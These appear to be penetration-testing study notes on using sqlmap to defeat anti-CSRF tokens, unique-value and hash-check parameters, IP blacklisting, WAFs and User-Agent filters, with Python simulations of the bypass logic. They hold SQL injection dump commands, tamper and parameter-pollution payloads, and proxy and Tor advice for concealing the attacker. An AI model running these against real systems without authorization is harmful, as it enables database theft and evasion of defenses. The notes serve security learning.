BYPASSING WEBAPP PROTECTIONS

ANTI-CSRF TOKEN BYPASS

anti-cross-site request forgery (anti-CSRF) tokens carried in every HTTP request are one of the first lines of defense against automation tools. anti-CSRF was originally introduced to prevent attacks in which a victim is lured into following a malicious link, but because a valid token has to be fetched and parsed from the page before every request, the feature also inadvertently hardened applications against (unwanted) automation: replaying a captured request with a stale token is simply rejected.

sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
BURP > Proxy > Intercept > Raw > right-click > copy to file > burpRequest.txt
 * this workflow is used when the target request carries parameters, cookies and a long list of
   header values that are easier to capture in Burp Suite and export to a file than to rebuild by hand;
   sqlmap then replays the exported request with -r

 * inspect the request and obtain any pertinent info
    - tokens
       - id=1&t0ken=AkU8r0F07g8TsHhG9WnkrNvOyrNJchXnWWbZlkZsZM

root@oco:~$ sqlmap -r reqCase8.txt --dump --batch --no-cast --random-agent --csrf-token="t0ken" --tamper=space2comment
 * --tamper is used when WAFs are identified during the initial scans
 * --csrf-token names the parameter holding the anti-CSRF token; before each request sqlmap parses the previous response for a fresh value of that parameter and uses it in the next request
    - the parameter name must already appear in the request data captured by Burp
    - if the token is issued by a different page than the one being tested, point sqlmap at that page with --csrf-url

UNIQUE VALUE BYPASS

this mechanism is similar to the anti-CSRF technique, except that nothing has to be parsed from the page content: by simply requiring that each request carries a fresh, never-before-seen value in a predefined parameter, the web application can cheaply reject replayed (CSRF) requests while at the same time breaking automation tools that resend the same captured request over and over.

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
BURP > Proxy > Intercept > Raw > right-click > copy to file > burpRequest.txt
 * this workflow is used when the target request carries parameters, cookies and a long list of
   header values that are easier to capture in Burp Suite and export to a file than to rebuild by hand;
   sqlmap then replays the exported request with -r

 * inspect the request and obtain any pertinent info
    - parameters: id and uid
       - GET /case9.php?id=1&uid=1797825706 HTTP/1.1
    - based on the above request, the parameter carrying the per-request unique value could be either of the following
       - id or uid, or both!

root@oco:~$ sqlmap -r reqCase9.txt --dump --batch --no-cast --random-agent --tamper=space2comment --randomize=id
 * if this produces no results (e.g. every request is rejected or returns the same error page), try the other parameter

root@oco:~$ sqlmap -r reqCase9.txt --dump --batch --no-cast --random-agent --tamper=space2comment --randomize=uid
 * --randomize names the parameter whose value sqlmap replaces, before every request, with a fresh random value of the same length and character classes as the original (digits stay digits, letters stay letters)
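What --csrf-token and --randomize do before every request, as an added example that is not part of the original notes and not sqlmap's own code: a fresh anti-CSRF token is parsed out of the last page, the unique-value parameter is replaced with a value of the same shape, and only then is the payload sent. The target application, the captured request body, and the parameter names t0ken and uid are all constructed here to match the two cases above; the target is a stand-in that issues a one-time token per page load and refuses any uid it has already seen.

```python
import random
import re
import string
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlencode

TOKEN_PARAM = "t0ken"   # assumed name of the anti-CSRF field (matches the --csrf-token example above)
UNIQUE_PARAM = "uid"    # assumed name of the unique-value field (matches the --randomize example above)
CAPTURED = "id=1&t0ken=STALE&uid=1797825706"   # constructed request body, as if exported from Burp


class TokenExtractor(HTMLParser):
    """Pull the value of <input name="t0ken" value="..."> out of a response body."""

    def __init__(self, name):
        super().__init__()
        self.name, self.value = name, None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("name") == self.name:
            self.value = a.get("value")


def extract_token(html, name=TOKEN_PARAM):
    parser = TokenExtractor(name)
    parser.feed(html)
    return parser.value


def set_param(data, name, value):
    """Rebuild an application/x-www-form-urlencoded body with one field replaced."""
    fields = parse_qsl(data, keep_blank_values=True)
    return urlencode([(k, value if k == name else v) for k, v in fields])


def randomize_like(value, avoid=()):
    """Fresh value with the same shape as the original (digit runs stay digits of the same
    length, letter runs stay letters of the same case); never returns a value in `avoid`."""
    def sub(m):
        run = m.group(0)
        pool = string.digits if run.isdigit() else (
            string.ascii_uppercase if run.isupper() else string.ascii_lowercase)
        return "".join(random.choice(pool) for _ in run)
    while True:
        candidate = re.sub(r"\d+|[A-Za-z]+", sub, value)
        if candidate not in avoid:
            return candidate


class Target:
    """Constructed stand-in for the protected application: every page load issues a
    one-time anti-CSRF token, and every uid value may be used only once."""

    def __init__(self):
        self.token, self.seen_uids = None, set()

    def get_page(self):
        self.token = "".join(random.choices(string.ascii_letters + string.digits, k=43))
        return ('<form method="post"><input type="hidden" name="%s" value="%s">'
                '<input name="id"><input name="%s"></form>' % (TOKEN_PARAM, self.token, UNIQUE_PARAM))

    def post(self, body):
        fields = dict(parse_qsl(body, keep_blank_values=True))
        ok = fields.get(TOKEN_PARAM) == self.token and fields.get(UNIQUE_PARAM) not in self.seen_uids
        self.token = None                       # the token is consumed whether or not the request passed
        self.seen_uids.add(fields.get(UNIQUE_PARAM))
        return 200 if ok else 403


def replay_captured_request(target, captured=CAPTURED):
    """What a naive replay does: fetch one token, then send the same request twice."""
    body = set_param(captured, TOKEN_PARAM, extract_token(target.get_page()))
    return target.post(body), target.post(body)


def inject_with_refresh(target, payloads, captured=CAPTURED):
    """What --csrf-token and --randomize automate: before every request, fetch a fresh
    token from the page and replace the unique value, then send the payload."""
    used = {dict(parse_qsl(captured, keep_blank_values=True)).get(UNIQUE_PARAM)}
    statuses = []
    for payload in payloads:
        body = set_param(captured, "id", payload)
        body = set_param(body, TOKEN_PARAM, extract_token(target.get_page()))
        fresh = randomize_like("1797825706", avoid=used)
        used.add(fresh)
        body = set_param(body, UNIQUE_PARAM, fresh)
        statuses.append(target.post(body))
    return statuses
```

The replay returns (200, 403): the second request reuses a consumed token, which is exactly why sqlmap without --csrf-token sees nothing but error pages. With the refresh loop every payload is accepted, and the shape-preserving randomization keeps the uid looking like the original so that length or type checks on the server side are not tripped either.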

CALCULATED PARAMETER BYPASS

this is a mechanism where the web application expects one parameter value to be calculated from some other parameter value(s). Most often, one parameter has to carry the message digest of another (e.g. h=MD5(id)), so any change to id that is not accompanied by a recomputed h is rejected before the value ever reaches the database.

sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id.encode()).hexdigest()" --batch -v 5 | grep URI
 * --eval is used to bypass this mechanism: the given Python code is evaluated just before each request is sent, with every request parameter available as a variable of the same name, so h is recomputed from the (injected) id value
    - hashlib hashes bytes, hence id.encode(); c4ca4238a0b923820dcc509a6f75849b is MD5("1")
    - -v 5 | grep URI prints the final URI of every request, so the recomputed digest can be checked
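The calculated-parameter check and its bypass, as an added example that is not part of the original notes and not sqlmap's own code. The server-side check, the parameter names id and h, and the keyed variant are all constructed here; the recompute step is the same transformation the --eval snippet above performs before every request, generalised to any hashlib algorithm name. The keyed variant is the caveat: if h is an HMAC over id with a server-side secret, there is nothing --eval can recompute.

```python
import hashlib
import hmac
from urllib.parse import parse_qsl, urlencode

ID_PARAM, DIGEST_PARAM = "id", "h"   # assumed parameter names, matching the example URL above
BASE_QUERY = "id=1&h=c4ca4238a0b923820dcc509a6f75849b"   # constructed, taken from the example URL


def digest_of(value, algorithm="md5"):
    """Message digest of a parameter value as a hex string. hashlib works on bytes, so the
    (str) value must be encoded first; this is the step the --eval snippet has to perform."""
    return hashlib.new(algorithm, value.encode()).hexdigest()


def server_accepts(query, algorithm="md5"):
    """Constructed stand-in for the target's check: h must equal digest(id)."""
    params = dict(parse_qsl(query, keep_blank_values=True))
    return params.get(DIGEST_PARAM) == digest_of(params.get(ID_PARAM, ""), algorithm)


def keyed_server_accepts(query, secret, algorithm="md5"):
    """Constructed variant in which h is an HMAC over id with a server-side secret."""
    params = dict(parse_qsl(query, keep_blank_values=True))
    expected = hmac.new(secret, params.get(ID_PARAM, "").encode(), algorithm).hexdigest()
    return hmac.compare_digest(params.get(DIGEST_PARAM, ""), expected)


def inject(query, payload):
    """Replace id with an injection payload without touching h (what plain sqlmap would send)."""
    fields = parse_qsl(query, keep_blank_values=True)
    return urlencode([(k, payload if k == ID_PARAM else v) for k, v in fields])


def recompute(query, algorithm="md5"):
    """Equivalent of --eval="import hashlib; h=hashlib.md5(id.encode()).hexdigest()":
    rebuild h from whatever value id currently holds, leaving the other fields alone."""
    fields = parse_qsl(query, keep_blank_values=True)
    fresh = digest_of(dict(fields)[ID_PARAM], algorithm)
    return urlencode([(k, fresh if k == DIGEST_PARAM else v) for k, v in fields])


def probe(query, payloads, algorithm="md5"):
    """For each payload: is it accepted as sent, and is it accepted once h is recomputed?"""
    return [(server_accepts(inject(query, p), algorithm),
             server_accepts(recompute(inject(query, p), algorithm), algorithm))
            for p in payloads]
```

Every probe comes back as (False, True): the injected id fails the digest check until h is recomputed, after which the same payload passes. The keyed variant stays False no matter what is recomputed, which is the check to run (by hand, or by diffing a few captured requests) before spending time on --eval at all.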

IP ADDRESS CONCEALING

this method is for when the target has a protection mechanism that blacklists any IP address that triggers a malicious event.

 * --proxy and --proxy-file are used to conceal the attacker's IP address
    - e.g., --proxy="socks4://177.39.187.70:33283"
    - e.g., --proxy-file="proxyList" (one proxy per line; sqlmap rotates through the list, and --proxy-freq sets how many requests are sent before switching)
    - --tor routes the traffic through the Tor network instead; --check-tor verifies that Tor is actually being used before the scan starts

WAF BYPASS

sqlmap initially sends a predefined malicious-looking payload in a non-existent parameter (a random name such as ?pfov=...) and compares the response with a normal one to test for the presence of a Web Application Firewall (WAF). To identify the actual product, sqlmap uses the third-party library identYwaf, which contains signatures for around 80 different WAF solutions.

 * --skip-waf skips this heuristic test and produces less noise (useful when the WAF is already known, or when the probe itself would get the source IP blacklisted)

USER-AGENT BLACKLISTING BYPASS

when HTTP error codes in the 5XX range are encountered while running sqlmap, one of the first things to consider is blacklisting of the default User-Agent that sqlmap sends
 * e.g. User-agent: sqlmap/1.4.9 (http://sqlmap.org)

 * --random-agent replaces the default User-Agent with a value chosen at random from a large pool of real browser User-Agent strings; --user-agent="..." sets a specific one instead

TAMPER SCRIPTS

the most popular mechanisms implemented by sqlmap for bypassing WAF/IPS solutions are the "tamper" scripts: small Python scripts that modify each request just before it is sent to the target in order to get past some protection.

one of the most popular tamper scripts, between, replaces all occurrences of the greater-than operator (>) with NOT BETWEEN 0 AND #, and the equals operator (=) with BETWEEN # AND #. This way, many primitive protection mechanisms (mostly focused on preventing XSS, and therefore keyed on characters such as > and =) are easily bypassed, at least for SQLi purposes.

Tamper scripts can be chained, one after another, within the --tamper option (e.g. --tamper=between,randomcase), where they are run based on their predefined priority rather than the order given. A priority is predefined to prevent unwanted behavior, as some scripts modify payloads by changing their SQL syntax (e.g. ifnull2ifisnull) and must run before the purely cosmetic ones. In contrast, some tamper scripts do not care about the inner content at all (e.g. appendnullbyte).

Tamper scripts can modify any part of the request, although the majority only change the payload content.

 * --list-tampers displays the whole list of implemented tamper scripts, along with their descriptions

MISC BYPASSES

CHUNKED TRANSFER ENCODING

with chunked transfer encoding turned on, the POST request's body is split into so-called "chunks", each prefixed with its length in hex. Blacklisted SQL keywords can be split across chunk boundaries so that a filter inspecting the raw request never sees the whole keyword, while the server reassembles the body exactly as before.

 * --chunked

HTTP PARAMETER POLLUTION (HPP)

here the payload is split, in a way similar to --chunked, across several values of the same parameter name (e.g. id=1&id=UNION&id=SELECT&id=username,password&id=FROM&id=users...), which are concatenated back together by target platforms that support it (e.g. ASP, which joins repeated values with a comma). A filter that inspects each parameter value on its own never sees the whole payload.

 * --hpp
